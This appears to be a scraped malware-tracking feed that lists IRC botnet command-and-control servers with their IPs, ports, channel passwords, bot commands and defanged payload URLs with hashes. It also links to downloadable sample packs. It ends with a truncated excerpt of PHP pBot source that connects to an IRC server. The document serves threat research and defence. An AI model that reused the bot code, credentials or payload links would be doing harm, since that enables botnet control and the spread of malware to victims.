Server: 64.120.135.140:1434 Username: mmgamzu Nickname: n{DE|XPa}mmgamzu Channel: #mrag (Password: ngrBot) hosting infos: http://whois.domaintools.com/64.120.135.140
f0001.info/f0010.info/thismynew1.info(ngrBot hosted by Czech Republic Zlin Fdcservers.net)
Resolved : [f0001.info] To [50.7.193.194] Resolved : [f0010.info] To [50.7.193.194] Resolved : [thismynew1.info] To [50.7.193.194] mom002.net not active now Server: 50.7.193.194:1887 Server Password: Username: jhdkutg Nickname: n{DE|XPa}jhdkutg Channel: #bon2 (Password: speedd) Channeltopic: :~pu hxxp://hotfile.com/dl/196250384/528b038/bonkapawes.exe f931d3eb10db2822e2f5d0b989e2a5b4 ~s -o ~s Download URLs hxxp://69.197.137.58/ (api.wipmania.com) hxxp://199.7.177.244/dl/196250388/7241731/avx.exe (hotfile.com) hxxp://74.120.9.239/get/dd7d65c3bbc12e445706a49c446988ac892a41d5/512e2c88/2/812b96beef6fea89/bb28b14/avx.exe (s251.hotfile.com) hxxp://199.7.177.244/dl/196250388/7241731/avx.exe (hotfile.com) hxxp://74.120.9.239/get/a1c05bb55ad6d37d36fec2886739a08919e1fd13/512e2cb6/2/812b96beef6fea89/bb28b14/avx.exe (s251.hotfile.com) hosting infos:http://whois.domaintools.com/50.7.193.194
92mb samples for analysis
This package have alot of irc bots samples banking trojans linux bots samples are provided only for analysis purposes dont run them on your machine use vmware Source Source
serv16.3sli.us(ngrBot hosted in Romania Bucharest Voxility S.r.l.)
Thanks to anonymous guy here for the sample wich u can download here:hxxp://sharesend.com/ola3pkmx for finding this botnet Resolved : [serv16.3sli.us] To [109.163.233.44] 109.163.233.44:8939Nick: n{US|XPa}uufzjxqUsername: uufzjxqServer Pass: newJoined Channel: ##new with Password newChannel Topic for Channel ##new: “&mod usbi on &mod pdef on &mdns hxxp://109.163.233.44/dns.txt” hosting infos: http://whois.domaintools.com/109.163.233.44
46.38.63.119(reptile mod hosted in Russian Federation Moscow Jsc Tel Company)
From the nick format looks like reptile mod Local users: 45 147 Current local users 45, max 147 Global users: 45 147 Current global users 45, max 147 Server: 46.38.63.119:6667 Username: 3 Nickname: [D|x86|DEU|XP|1020942] Channel: #inet (Password: ) Channeltopic: :?bitcoin-24896128560982359857125906 gpu high * Topic for #inet set by Dexter at Mon Jan 28 15:08:05 2013Read more...
ads.pr4d.tk/teams.xsaudix.net/y.servicesql.info(ngrBot hosted in United States Scranton Network Operations Center Inc.)
This botnet was found from anonymous guy here thanks to him for the submition Resolved : [ads.pr4d.tk] To [64.120.186.229] Resolved : [teams.xsaudix.net] To [64.120.186.230] arab heckers Resolved : [y.servicesql.info] To [64.120.186.228] Server: 64.120.186.229:1433 Username: zdbcuzs Nickname: n{DE|XPa}zdbcuzs Channel: #tmw5 (Password: ngrBot) Channeltopic: :!u5 hxxp://bmc.linkpc.net/download/s1.exe 5b8fe0ee31617ee9596a5861a2192304 !u5 hxxp://bmc.linkpc.net/s1cr.exe cdfc01b434fc787d487ce088dd391e0b !u6 hxxp://bmc.linkpc.net/chat.exe 7140176e63651b027fd5f3b19252c4bf Server: 64.120.186.228:1434 Username: mmgamzuRead more...
demoralize.biz(Andromeda hosted in Germany Frankfurt Am Main Voxility S.r.l.)
Resolved :[demoralize.biz] To [37.221.170.194] Panel:hxxp://37.221.170.194/panel/image.php Module:hxxp://37.221.170.194/panel/r.pack DirtJumper:demoralize.biz/dj/index.php Other files:hxxp://demoralize.biz/f/ hosting infos: http://whois.domaintools.com/37.221.170.194
208.117.34.145(ngrBot hosted in United States Chicago Steadfast Networks)
Server: 208.117.34.145:1887 Server:185.12.14.131:1887 Username: eyaimlr Nickname: n{DE|XPa}eyaimlr Channel: #bon2 (Password: speedd) Channeltopic: :~pu hxxp://www.sendspace.com/pro/dl/ppbf96 26bc0e7256f2a7fb536bdd19e0464e49 ~s -o ~s Download URLs hxxp://69.31.136.17/dlpro/29c185ae59e68f635192223e650939a3/50fe994c/ppbf96/mariayonosy.exe (fs03n5.sendspace.com) hosting infos: http://whois.domaintools.com/208.117.34.145
105mb samples
This package contains irc bots.banking trojans,rootkits and other samples Only for analysing purposes Source Source
irc.by(Linux pBots hosted in Netherlands Netrc Llc)
Resolved : [irc.by] To [91.214.111.26] Here is the pBot: <!-- set_time_limit(0); error_reporting(0); class pBot { var config = array("server"=>"irc.by", "port"=>6669, "pass"=>"fx", "prefix"=>"fvox", "maxrand"=>8, "chan"=>"#webs", "key"=>"", "modes"=>"+iB-x", "password"=>"webs", "trigger"=>".", "hostauth"=>"Click.Here.To.Install.These.Updates" // * for any hostname ); var users = array(); function start() { if(!(this->conn = fsockopen(this->config['server'],this->config['port'],e,s,30))) this->start(); ident = ""; alph = range("a","z"); for(i=0;i<this->config['maxrand'];i++) ident .=Read more...